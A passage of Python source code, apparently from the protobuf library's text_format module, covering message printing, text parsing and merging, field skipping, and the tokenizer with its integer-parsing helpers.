using float_format='.15g'. To ensure that converting to text and back to a
proto will result in an identical value, float_format='.17g' should be used.
Args:
message: The protocol buffers message.
as_utf8: Produce text output in UTF8 format.
as_one_line: Don't introduce newlines between fields.
pointy_brackets: If True, use angle brackets instead of curly braces for
nesting.
use_index_order: If True, print fields of a proto message using the order
defined in source code instead of the field number. By default, use the
field number order.
float_format: If set, use this to specify floating point number formatting
(per the "Format Specification Mini-Language"); otherwise, str() is used.
use_field_number: If True, print field numbers instead of names.
descriptor_pool: A DescriptorPool used to resolve Any types.
indent: The indent level, in terms of spaces, for pretty print.
message_formatter: A function(message, indent, as_one_line): unicode|None
to custom format selected sub-messages (usually based on message type).
Use to pretty print parts of the protobuf for easier diffing.
Returns:
A string of the text formatted protocol buffer message.
"""
out = TextWriter(as_utf8)
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, use_field_number,
descriptor_pool, message_formatter)
printer.PrintMessage(message)
result = out.getvalue()
out.close()
if as_one_line:
return result.rstrip()
return result
def _IsMapEntry(field):
return (field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.message_type.has_options and
field.message_type.GetOptions().map_entry)
def PrintMessage(message,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
use_field_number=False,
descriptor_pool=None,
message_formatter=None):
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, use_field_number,
descriptor_pool, message_formatter)
printer.PrintMessage(message)
def PrintField(field,
value,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
message_formatter=None):
"""Print a single field name/value pair."""
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, message_formatter)
printer.PrintField(field, value)
def PrintFieldValue(field,
value,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
message_formatter=None):
"""Print a single field value (not including name)."""
printer = _Printer(out, indent, as_utf8, as_one_line, pointy_brackets,
use_index_order, float_format, message_formatter)
printer.PrintFieldValue(field, value)
def _BuildMessageFromTypeName(type_name, descriptor_pool):
"""Returns a protobuf message instance.
Args:
type_name: Fully-qualified protobuf message type name string.
descriptor_pool: DescriptorPool instance.
Returns:
A Message instance of type matching type_name, or None if the a Descriptor
wasn't found matching type_name.
"""
# pylint: disable=g-import-not-at-top
if descriptor_pool is None:
from google.protobuf import descriptor_pool as pool_mod
descriptor_pool = pool_mod.Default()
from google.protobuf import symbol_database
database = symbol_database.Default()
try:
message_descriptor = descriptor_pool.FindMessageTypeByName(type_name)
except KeyError:
return None
message_type = database.GetPrototype(message_descriptor)
return message_type()
class _Printer(object):
"""Text format printer for protocol message."""
def __init__(self,
out,
indent=0,
as_utf8=False,
as_one_line=False,
pointy_brackets=False,
use_index_order=False,
float_format=None,
use_field_number=False,
descriptor_pool=None,
message_formatter=None):
"""Initialize the Printer.
Floating point values can be formatted compactly with 15 digits of
precision (which is the most that IEEE 754 "double" can guarantee)
using float_format='.15g'. To ensure that converting to text and back to a
proto will result in an identical value, float_format='.17g' should be used.
Args:
out: To record the text format result.
indent: The indent level for pretty print.
as_utf8: Produce text output in UTF8 format.
as_one_line: Don't introduce newlines between fields.
pointy_brackets: If True, use angle brackets instead of curly braces for
nesting.
use_index_order: If True, print fields of a proto message using the order
defined in source code instead of the field number. By default, use the
field number order.
float_format: If set, use this to specify floating point number formatting
(per the "Format Specification Mini-Language"); otherwise, str() is
used.
use_field_number: If True, print field numbers instead of names.
descriptor_pool: A DescriptorPool used to resolve Any types.
message_formatter: A function(message, indent, as_one_line): unicode|None
to custom format selected sub-messages (usually based on message type).
Use to pretty print parts of the protobuf for easier diffing.
"""
self.out = out
self.indent = indent
self.as_utf8 = as_utf8
self.as_one_line = as_one_line
self.pointy_brackets = pointy_brackets
self.use_index_order = use_index_order
self.float_format = float_format
self.use_field_number = use_field_number
self.descriptor_pool = descriptor_pool
self.message_formatter = message_formatter
def _TryPrintAsAnyMessage(self, message):
"""Serializes if message is a google.protobuf.Any field."""
packed_message = _BuildMessageFromTypeName(message.TypeName(),
self.descriptor_pool)
if packed_message:
packed_message.MergeFromString(message.value)
self.out.write('%s[%s]' % (self.indent * ' ', message.type_url))
self._PrintMessageFieldValue(packed_message)
self.out.write(' ' if self.as_one_line else '\n')
return True
else:
return False
def _TryCustomFormatMessage(self, message):
formatted = self.message_formatter(message, self.indent, self.as_one_line)
if formatted is None:
return False
out = self.out
out.write(' ' * self.indent)
out.write(formatted)
out.write(' ' if self.as_one_line else '\n')
return True
def PrintMessage(self, message):
"""Convert protobuf message to text format.
Args:
message: The protocol buffers message.
"""
if self.message_formatter and self._TryCustomFormatMessage(message):
return
if (message.DESCRIPTOR.full_name == _ANY_FULL_TYPE_NAME and
self._TryPrintAsAnyMessage(message)):
return
fields = message.ListFields()
if self.use_index_order:
fields.sort(key=lambda x: x[0].index)
for field, value in fields:
if _IsMapEntry(field):
for key in sorted(value):
# This is slow for maps with submessage entires because it copies the
# entire tree. Unfortunately this would take significant refactoring
# of this file to work around.
#
# TODO(haberman): refactor and optimize if this becomes an issue.
entry_submsg = value.GetEntryClass()(key=key, value=value[key])
self.PrintField(field, entry_submsg)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
for element in value:
self.PrintField(field, element)
else:
self.PrintField(field, value)
def PrintField(self, field, value):
"""Print a single field name/value pair."""
out = self.out
out.write(' ' * self.indent)
if self.use_field_number:
out.write(str(field.number))
else:
if field.is_extension:
out.write('[')
if (field.containing_type.GetOptions().message_set_wire_format and
field.type == descriptor.FieldDescriptor.TYPE_MESSAGE and
field.label == descriptor.FieldDescriptor.LABEL_OPTIONAL):
out.write(field.message_type.full_name)
else:
out.write(field.full_name)
out.write(']')
elif field.type == descriptor.FieldDescriptor.TYPE_GROUP:
# For groups, use the capitalized name.
out.write(field.message_type.name)
else:
out.write(field.name)
if field.cpp_type != descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
# The colon is optional in this case, but our cross-language golden files
# don't include it.
out.write(': ')
self.PrintFieldValue(field, value)
if self.as_one_line:
out.write(' ')
else:
out.write('\n')
def _PrintMessageFieldValue(self, value):
if self.pointy_brackets:
openb = '<'
closeb = '>'
else:
openb = '{'
closeb = '}'
if self.as_one_line:
self.out.write(' %s ' % openb)
self.PrintMessage(value)
self.out.write(closeb)
else:
self.out.write(' %s\n' % openb)
self.indent += 2
self.PrintMessage(value)
self.indent -= 2
self.out.write(' ' * self.indent + closeb)
def PrintFieldValue(self, field, value):
"""Print a single field value (not including name).
For repeated fields, the value should be a single element.
Args:
field: The descriptor of the field to be printed.
value: The value of the field.
"""
out = self.out
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
self._PrintMessageFieldValue(value)
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
enum_value = field.enum_type.values_by_number.get(value, None)
if enum_value is not None:
out.write(enum_value.name)
else:
out.write(str(value))
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
out.write('\"')
if isinstance(value, six.text_type):
out_value = value.encode('utf-8')
else:
out_value = value
if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
# We need to escape non-UTF8 chars in TYPE_BYTES field.
out_as_utf8 = False
else:
out_as_utf8 = self.as_utf8
out.write(text_encoding.CEscape(out_value, out_as_utf8))
out.write('\"')
elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
if value:
out.write('true')
else:
out.write('false')
elif field.cpp_type in _FLOAT_TYPES and self.float_format is not None:
out.write('{1:{0}}'.format(self.float_format, value))
else:
out.write(str(value))
def Parse(text,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
NOTE: for historical reasons this function does not clear the input
message. This is different from what the binary msg.ParseFrom(...) does.
Example
a = MyProto()
a.repeated_field.append('test')
b = MyProto()
text_format.Parse(repr(a), b)
text_format.Parse(repr(a), b) # repeated_field contains ["test", "test"]
# Binary version:
b.ParseFromString(a.SerializeToString()) # repeated_field is now "test"
Caller is responsible for clearing the message as needed.
Args:
text: Message text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
if not isinstance(text, str):
text = text.decode('utf-8')
return ParseLines(text.split('\n'),
message,
allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
def Merge(text,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
Like Parse(), but allows repeated values for a non-repeated field, and uses
the last one.
Args:
text: Message text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
return MergeLines(
text.split('\n'),
message,
allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
def ParseLines(lines,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
Args:
lines: An iterable of lines of a message's text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
parser = _Parser(allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
return parser.ParseLines(lines, message)
def MergeLines(lines,
message,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
"""Parses a text representation of a protocol message into a message.
Args:
lines: An iterable of lines of a message's text representation.
message: A protocol buffer message to merge into.
allow_unknown_extension: if True, skip over missing extensions and keep
parsing
allow_field_number: if True, both field number and field name are allowed.
descriptor_pool: A DescriptorPool used to resolve Any types.
Returns:
The same message passed as argument.
Raises:
ParseError: On text parsing problems.
"""
parser = _Parser(allow_unknown_extension,
allow_field_number,
descriptor_pool=descriptor_pool)
return parser.MergeLines(lines, message)
class _Parser(object):
"""Text format parser for protocol message."""
def __init__(self,
allow_unknown_extension=False,
allow_field_number=False,
descriptor_pool=None):
self.allow_unknown_extension = allow_unknown_extension
self.allow_field_number = allow_field_number
self.descriptor_pool = descriptor_pool
def ParseFromString(self, text, message):
"""Parses a text representation of a protocol message into a message."""
if not isinstance(text, str):
text = text.decode('utf-8')
return self.ParseLines(text.split('\n'), message)
def ParseLines(self, lines, message):
"""Parses a text representation of a protocol message into a message."""
self._allow_multiple_scalars = False
self._ParseOrMerge(lines, message)
return message
def MergeFromString(self, text, message):
"""Merges a text representation of a protocol message into a message."""
return self._MergeLines(text.split('\n'), message)
def MergeLines(self, lines, message):
"""Merges a text representation of a protocol message into a message."""
self._allow_multiple_scalars = True
self._ParseOrMerge(lines, message)
return message
def _ParseOrMerge(self, lines, message):
"""Converts a text representation of a protocol message into a message.
Args:
lines: Lines of a message's text representation.
message: A protocol buffer message to merge into.
Raises:
ParseError: On text parsing problems.
"""
tokenizer = Tokenizer(lines)
while not tokenizer.AtEnd():
self._MergeField(tokenizer, message)
def _MergeField(self, tokenizer, message):
"""Merges a single protocol message field into a message.
Args:
tokenizer: A tokenizer to parse the field name and values.
message: A protocol message to record the data.
Raises:
ParseError: In case of text parsing problems.
"""
message_descriptor = message.DESCRIPTOR
if tokenizer.TryConsume('['):
name = [tokenizer.ConsumeIdentifier()]
while tokenizer.TryConsume('.'):
name.append(tokenizer.ConsumeIdentifier())
name = '.'.join(name)
if not message_descriptor.is_extendable:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" does not have extensions.' %
message_descriptor.full_name)
# pylint: disable=protected-access
field = message.Extensions._FindExtensionByName(name)
# pylint: enable=protected-access
if not field:
if self.allow_unknown_extension:
field = None
else:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" not registered. '
'Did you import the _pb2 module which defines it? '
'If you are trying to place the extension in the MessageSet '
'field of another message that is in an Any or MessageSet field, '
'that message\'s _pb2 module must be imported as well' % name)
elif message_descriptor != field.containing_type:
raise tokenizer.ParseErrorPreviousToken(
'Extension "%s" does not extend message type "%s".' %
(name, message_descriptor.full_name))
tokenizer.Consume(']')
else:
name = tokenizer.ConsumeIdentifierOrNumber()
if self.allow_field_number and name.isdigit():
number = ParseInteger(name, True, True)
field = message_descriptor.fields_by_number.get(number, None)
if not field and message_descriptor.is_extendable:
field = message.Extensions._FindExtensionByNumber(number)
else:
field = message_descriptor.fields_by_name.get(name, None)
# Group names are expected to be capitalized as they appear in the
# .proto file, which actually matches their type names, not their field
# names.
if not field:
field = message_descriptor.fields_by_name.get(name.lower(), None)
if field and field.type != descriptor.FieldDescriptor.TYPE_GROUP:
field = None
if (field and field.type == descriptor.FieldDescriptor.TYPE_GROUP and
field.message_type.name != name):
field = None
if not field:
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" has no field named "%s".' %
(message_descriptor.full_name, name))
if field:
if not self._allow_multiple_scalars and field.containing_oneof:
# Check if there's a different field set in this oneof.
# Note that we ignore the case if the same field was set before, and we
# apply _allow_multiple_scalars to non-scalar fields as well.
which_oneof = message.WhichOneof(field.containing_oneof.name)
if which_oneof is not None and which_oneof != field.name:
raise tokenizer.ParseErrorPreviousToken(
'Field "%s" is specified along with field "%s", another member '
'of oneof "%s" for message type "%s".' %
(field.name, which_oneof, field.containing_oneof.name,
message_descriptor.full_name))
if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
tokenizer.TryConsume(':')
merger = self._MergeMessageField
else:
tokenizer.Consume(':')
merger = self._MergeScalarField
if (field.label == descriptor.FieldDescriptor.LABEL_REPEATED and
tokenizer.TryConsume('[')):
# Short repeated format, e.g. "foo: [1, 2, 3]"
while True:
merger(tokenizer, message, field)
if tokenizer.TryConsume(']'):
break
tokenizer.Consume(',')
else:
merger(tokenizer, message, field)
else: # Proto field is unknown.
assert self.allow_unknown_extension
_SkipFieldContents(tokenizer)
# For historical reasons, fields may optionally be separated by commas or
# semicolons.
if not tokenizer.TryConsume(','):
tokenizer.TryConsume(';')
def _ConsumeAnyTypeUrl(self, tokenizer):
"""Consumes a google.protobuf.Any type URL and returns the type name."""
# Consume "type.googleapis.com/".
prefix = [tokenizer.ConsumeIdentifier()]
tokenizer.Consume('.')
prefix.append(tokenizer.ConsumeIdentifier())
tokenizer.Consume('.')
prefix.append(tokenizer.ConsumeIdentifier())
tokenizer.Consume('/')
# Consume the fully-qualified type name.
name = [tokenizer.ConsumeIdentifier()]
while tokenizer.TryConsume('.'):
name.append(tokenizer.ConsumeIdentifier())
return '.'.join(prefix), '.'.join(name)
def _MergeMessageField(self, tokenizer, message, field):
"""Merges a single scalar field into a message.
Args:
tokenizer: A tokenizer to parse the field value.
message: The message of which field is a member.
field: The descriptor of the field to be merged.
Raises:
ParseError: In case of text parsing problems.
"""
is_map_entry = _IsMapEntry(field)
if tokenizer.TryConsume('<'):
end_token = '>'
else:
tokenizer.Consume('{')
end_token = '}'
if (field.message_type.full_name == _ANY_FULL_TYPE_NAME and
tokenizer.TryConsume('[')):
type_url_prefix, packed_type_name = self._ConsumeAnyTypeUrl(tokenizer)
tokenizer.Consume(']')
tokenizer.TryConsume(':')
if tokenizer.TryConsume('<'):
expanded_any_end_token = '>'
else:
tokenizer.Consume('{')
expanded_any_end_token = '}'
expanded_any_sub_message = _BuildMessageFromTypeName(packed_type_name,
self.descriptor_pool)
if not expanded_any_sub_message:
raise ParseError('Type %s not found in descriptor pool' %
packed_type_name)
while not tokenizer.TryConsume(expanded_any_end_token):
if tokenizer.AtEnd():
raise tokenizer.ParseErrorPreviousToken('Expected "%s".' %
(expanded_any_end_token,))
self._MergeField(tokenizer, expanded_any_sub_message)
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
any_message = getattr(message, field.name).add()
else:
any_message = getattr(message, field.name)
any_message.Pack(expanded_any_sub_message,
type_url_prefix=type_url_prefix)
elif field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
sub_message = message.Extensions[field].add()
elif is_map_entry:
sub_message = getattr(message, field.name).GetEntryClass()()
else:
sub_message = getattr(message, field.name).add()
else:
if field.is_extension:
sub_message = message.Extensions[field]
else:
sub_message = getattr(message, field.name)
sub_message.SetInParent()
while not tokenizer.TryConsume(end_token):
if tokenizer.AtEnd():
raise tokenizer.ParseErrorPreviousToken('Expected "%s".' % (end_token,))
self._MergeField(tokenizer, sub_message)
if is_map_entry:
value_cpptype = field.message_type.fields_by_name['value'].cpp_type
if value_cpptype == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
value = getattr(message, field.name)[sub_message.key]
value.MergeFrom(sub_message.value)
else:
getattr(message, field.name)[sub_message.key] = sub_message.value
@staticmethod
def _IsProto3Syntax(message):
message_descriptor = message.DESCRIPTOR
return (hasattr(message_descriptor, 'syntax') and
message_descriptor.syntax == 'proto3')
def _MergeScalarField(self, tokenizer, message, field):
"""Merges a single scalar field into a message.
Args:
tokenizer: A tokenizer to parse the field value.
message: A protocol message to record the data.
field: The descriptor of the field to be merged.
Raises:
ParseError: In case of text parsing problems.
RuntimeError: On runtime errors.
"""
_ = self.allow_unknown_extension
value = None
if field.type in (descriptor.FieldDescriptor.TYPE_INT32,
descriptor.FieldDescriptor.TYPE_SINT32,
descriptor.FieldDescriptor.TYPE_SFIXED32):
value = _ConsumeInt32(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_INT64,
descriptor.FieldDescriptor.TYPE_SINT64,
descriptor.FieldDescriptor.TYPE_SFIXED64):
value = _ConsumeInt64(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT32,
descriptor.FieldDescriptor.TYPE_FIXED32):
value = _ConsumeUint32(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_UINT64,
descriptor.FieldDescriptor.TYPE_FIXED64):
value = _ConsumeUint64(tokenizer)
elif field.type in (descriptor.FieldDescriptor.TYPE_FLOAT,
descriptor.FieldDescriptor.TYPE_DOUBLE):
value = tokenizer.ConsumeFloat()
elif field.type == descriptor.FieldDescriptor.TYPE_BOOL:
value = tokenizer.ConsumeBool()
elif field.type == descriptor.FieldDescriptor.TYPE_STRING:
value = tokenizer.ConsumeString()
elif field.type == descriptor.FieldDescriptor.TYPE_BYTES:
value = tokenizer.ConsumeByteString()
elif field.type == descriptor.FieldDescriptor.TYPE_ENUM:
value = tokenizer.ConsumeEnum(field)
else:
raise RuntimeError('Unknown field type %d' % field.type)
if field.label == descriptor.FieldDescriptor.LABEL_REPEATED:
if field.is_extension:
message.Extensions[field].append(value)
else:
getattr(message, field.name).append(value)
else:
# Proto3 doesn't represent presence so we can't test if multiple scalars
# have occurred. We have to allow them.
can_check_presence = not self._IsProto3Syntax(message)
if field.is_extension:
if (not self._allow_multiple_scalars and can_check_presence and
message.HasExtension(field)):
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" should not have multiple "%s" extensions.' %
(message.DESCRIPTOR.full_name, field.full_name))
else:
message.Extensions[field] = value
else:
if (not self._allow_multiple_scalars and can_check_presence and
message.HasField(field.name)):
raise tokenizer.ParseErrorPreviousToken(
'Message type "%s" should not have multiple "%s" fields.' %
(message.DESCRIPTOR.full_name, field.name))
else:
setattr(message, field.name, value)
def _SkipFieldContents(tokenizer):
"""Skips over contents (value or message) of a field.
Args:
tokenizer: A tokenizer to parse the field name and values.
"""
# Try to guess the type of this field.
# If this field is not a message, there should be a ":" between the
# field name and the field value and also the field value should not
# start with "{" or "<" which indicates the beginning of a message body.
# If there is no ":" or there is a "{" or "<" after ":", this field has
# to be a message or the input is ill-formed.
if tokenizer.TryConsume(':') and not tokenizer.LookingAt(
'{') and not tokenizer.LookingAt('<'):
_SkipFieldValue(tokenizer)
else:
_SkipFieldMessage(tokenizer)
def _SkipField(tokenizer):
"""Skips over a complete field (name and value/message).
Args:
tokenizer: A tokenizer to parse the field name and values.
"""
if tokenizer.TryConsume('['):
# Consume extension name.
tokenizer.ConsumeIdentifier()
while tokenizer.TryConsume('.'):
tokenizer.ConsumeIdentifier()
tokenizer.Consume(']')
else:
tokenizer.ConsumeIdentifier()
_SkipFieldContents(tokenizer)
# For historical reasons, fields may optionally be separated by commas or
# semicolons.
if not tokenizer.TryConsume(','):
tokenizer.TryConsume(';')
def _SkipFieldMessage(tokenizer):
"""Skips over a field message.
Args:
tokenizer: A tokenizer to parse the field name and values.
"""
if tokenizer.TryConsume('<'):
delimiter = '>'
else:
tokenizer.Consume('{')
delimiter = '}'
while not tokenizer.LookingAt('>') and not tokenizer.LookingAt('}'):
_SkipField(tokenizer)
tokenizer.Consume(delimiter)
def _SkipFieldValue(tokenizer):
"""Skips over a field value.
Args:
tokenizer: A tokenizer to parse the field name and values.
Raises:
ParseError: In case an invalid field value is found.
"""
# String/bytes tokens can come in multiple adjacent string literals.
# If we can consume one, consume as many as we can.
if tokenizer.TryConsumeByteString():
while tokenizer.TryConsumeByteString():
pass
return
if (not tokenizer.TryConsumeIdentifier() and
not _TryConsumeInt64(tokenizer) and not _TryConsumeUint64(tokenizer) and
not tokenizer.TryConsumeFloat()):
raise ParseError('Invalid field value: ' + tokenizer.token)
class Tokenizer(object):
"""Protocol buffer text representation tokenizer.
This class handles the lower level string parsing by splitting it into
meaningful tokens.
It was directly ported from the Java protocol buffer API.
"""
_WHITESPACE = re.compile(r'\s+')
_COMMENT = re.compile(r'(\s*#.*$)', re.MULTILINE)
_WHITESPACE_OR_COMMENT = re.compile(r'(\s|(#.*$))+', re.MULTILINE)
_TOKEN = re.compile('|'.join([
r'[a-zA-Z_][0-9a-zA-Z_+-]*', # an identifier
r'([0-9+-]|(\.[0-9]))[0-9a-zA-Z_.+-]*', # a number
] + [ # quoted str for each quote mark
r'{qt}([^{qt}\n\\]|\\.)*({qt}|\\?$)'.format(qt=mark) for mark in _QUOTES
]))
_IDENTIFIER = re.compile(r'[^\d\W]\w*')
_IDENTIFIER_OR_NUMBER = re.compile(r'\w+')
def __init__(self, lines, skip_comments=True):
self._position = 0
self._line = -1
self._column = 0
self._token_start = None
self.token = ''
self._lines = iter(lines)
self._current_line = ''
self._previous_line = 0
self._previous_column = 0
self._more_lines = True
self._skip_comments = skip_comments
self._whitespace_pattern = (skip_comments and self._WHITESPACE_OR_COMMENT
or self._WHITESPACE)
self._SkipWhitespace()
self.NextToken()
def LookingAt(self, token):
return self.token == token
def AtEnd(self):
"""Checks the end of the text was reached.
Returns:
True iff the end was reached.
"""
return not self.token
def _PopLine(self):
while len(self._current_line) <= self._column:
try:
self._current_line = next(self._lines)
except StopIteration:
self._current_line = ''
self._more_lines = False
return
else:
self._line += 1
self._column = 0
def _SkipWhitespace(self):
while True:
self._PopLine()
match = self._whitespace_pattern.match(self._current_line, self._column)
if not match:
break
length = len(match.group(0))
self._column += length
def TryConsume(self, token):
"""Tries to consume a given piece of text.
Args:
token: Text to consume.
Returns:
True iff the text was consumed.
"""
if self.token == token:
self.NextToken()
return True
return False
def Consume(self, token):
"""Consumes a piece of text.
Args:
token: Text to consume.
Raises:
ParseError: If the text couldn't be consumed.
"""
if not self.TryConsume(token):
raise self.ParseError('Expected "%s".' % token)
def ConsumeComment(self):
result = self.token
if not self._COMMENT.match(result):
raise self.ParseError('Expected comment.')
self.NextToken()
return result
def ConsumeCommentOrTrailingComment(self):
"""Consumes a comment, returns a 2-tuple (trailing bool, comment str)."""
# Tokenizer initializes _previous_line and _previous_column to 0. As the
# tokenizer starts, it looks like there is a previous token on the line.
just_started = self._line == 0 and self._column == 0
before_parsing = self._previous_line
comment = self.ConsumeComment()
# A trailing comment is a comment on the same line than the previous token.
trailing = (self._previous_line == before_parsing
and not just_started)
return trailing, comment
def TryConsumeIdentifier(self):
try:
self.ConsumeIdentifier()
return True
except ParseError:
return False
def ConsumeIdentifier(self):
"""Consumes protocol message field identifier.
Returns:
Identifier string.
Raises:
ParseError: If an identifier couldn't be consumed.
"""
result = self.token
if not self._IDENTIFIER.match(result):
raise self.ParseError('Expected identifier.')
self.NextToken()
return result
def TryConsumeIdentifierOrNumber(self):
try:
self.ConsumeIdentifierOrNumber()
return True
except ParseError:
return False
def ConsumeIdentifierOrNumber(self):
"""Consumes protocol message field identifier.
Returns:
Identifier string.
Raises:
ParseError: If an identifier couldn't be consumed.
"""
result = self.token
if not self._IDENTIFIER_OR_NUMBER.match(result):
raise self.ParseError('Expected identifier or number, got %s.' % result)
self.NextToken()
return result
def TryConsumeInteger(self):
try:
# Note: is_long only affects value type, not whether an error is raised.
self.ConsumeInteger()
return True
except ParseError:
return False
def ConsumeInteger(self, is_long=False):
"""Consumes an integer number.
Args:
is_long: True if the value should be returned as a long integer.
Returns:
The integer parsed.
Raises:
ParseError: If an integer couldn't be consumed.
"""
try:
result = _ParseAbstractInteger(self.token, is_long=is_long)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def TryConsumeFloat(self):
try:
self.ConsumeFloat()
return True
except ParseError:
return False
def ConsumeFloat(self):
"""Consumes an floating point number.
Returns:
The number parsed.
Raises:
ParseError: If a floating point number couldn't be consumed.
"""
try:
result = ParseFloat(self.token)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def ConsumeBool(self):
"""Consumes a boolean value.
Returns:
The bool parsed.
Raises:
ParseError: If a boolean value couldn't be consumed.
"""
try:
result = ParseBool(self.token)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def TryConsumeByteString(self):
try:
self.ConsumeByteString()
return True
except ParseError:
return False
def ConsumeString(self):
"""Consumes a string value.
Returns:
The string parsed.
Raises:
ParseError: If a string value couldn't be consumed.
"""
the_bytes = self.ConsumeByteString()
try:
return six.text_type(the_bytes, 'utf-8')
except UnicodeDecodeError as e:
raise self._StringParseError(e)
def ConsumeByteString(self):
"""Consumes a byte array value.
Returns:
The array parsed (as a string).
Raises:
ParseError: If a byte array value couldn't be consumed.
"""
the_list = [self._ConsumeSingleByteString()]
while self.token and self.token[0] in _QUOTES:
the_list.append(self._ConsumeSingleByteString())
return b''.join(the_list)
def _ConsumeSingleByteString(self):
"""Consume one token of a string literal.
String literals (whether bytes or text) can come in multiple adjacent
tokens which are automatically concatenated, like in C or Python. This
method only consumes one token.
Returns:
The token parsed.
Raises:
ParseError: When the wrong format data is found.
"""
text = self.token
if len(text) < 1 or text[0] not in _QUOTES:
raise self.ParseError('Expected string but found: %r' % (text,))
if len(text) < 2 or text[-1] != text[0]:
raise self.ParseError('String missing ending quote: %r' % (text,))
try:
result = text_encoding.CUnescape(text[1:-1])
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def ConsumeEnum(self, field):
try:
result = ParseEnum(field, self.token)
except ValueError as e:
raise self.ParseError(str(e))
self.NextToken()
return result
def ParseErrorPreviousToken(self, message):
"""Creates and *returns* a ParseError for the previously read token.
Args:
message: A message to set for the exception.
Returns:
A ParseError instance.
"""
return ParseError(message, self._previous_line + 1,
self._previous_column + 1)
def ParseError(self, message):
"""Creates and *returns* a ParseError for the current token."""
return ParseError(message, self._line + 1, self._column + 1)
def _StringParseError(self, e):
return self.ParseError('Couldn\'t parse string: ' + str(e))
def NextToken(self):
"""Reads the next meaningful token."""
self._previous_line = self._line
self._previous_column = self._column
self._column += len(self.token)
self._SkipWhitespace()
if not self._more_lines:
self.token = ''
return
match = self._TOKEN.match(self._current_line, self._column)
if not match and not self._skip_comments:
match = self._COMMENT.match(self._current_line, self._column)
if match:
token = match.group(0)
self.token = token
else:
self.token = self._current_line[self._column]
# Aliased so it can still be accessed by current visibility violators.
# TODO(dbarnett): Migrate violators to textformat_tokenizer.
_Tokenizer = Tokenizer # pylint: disable=invalid-name
def _ConsumeInt32(tokenizer):
"""Consumes a signed 32bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 32bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=True, is_long=False)
def _ConsumeUint32(tokenizer):
"""Consumes an unsigned 32bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 32bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=False, is_long=False)
def _TryConsumeInt64(tokenizer):
try:
_ConsumeInt64(tokenizer)
return True
except ParseError:
return False
def _ConsumeInt64(tokenizer):
"""Consumes a signed 32bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If a signed 32bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=True, is_long=True)
def _TryConsumeUint64(tokenizer):
try:
_ConsumeUint64(tokenizer)
return True
except ParseError:
return False
def _ConsumeUint64(tokenizer):
"""Consumes an unsigned 64bit integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
Returns:
The integer parsed.
Raises:
ParseError: If an unsigned 64bit integer couldn't be consumed.
"""
return _ConsumeInteger(tokenizer, is_signed=False, is_long=True)
def _TryConsumeInteger(tokenizer, is_signed=False, is_long=False):
try:
_ConsumeInteger(tokenizer, is_signed=is_signed, is_long=is_long)
return True
except ParseError:
return False
def _ConsumeInteger(tokenizer, is_signed=False, is_long=False):
"""Consumes an integer number from tokenizer.
Args:
tokenizer: A tokenizer used to parse the number.
is_signed: True if a signed integer must be parsed.
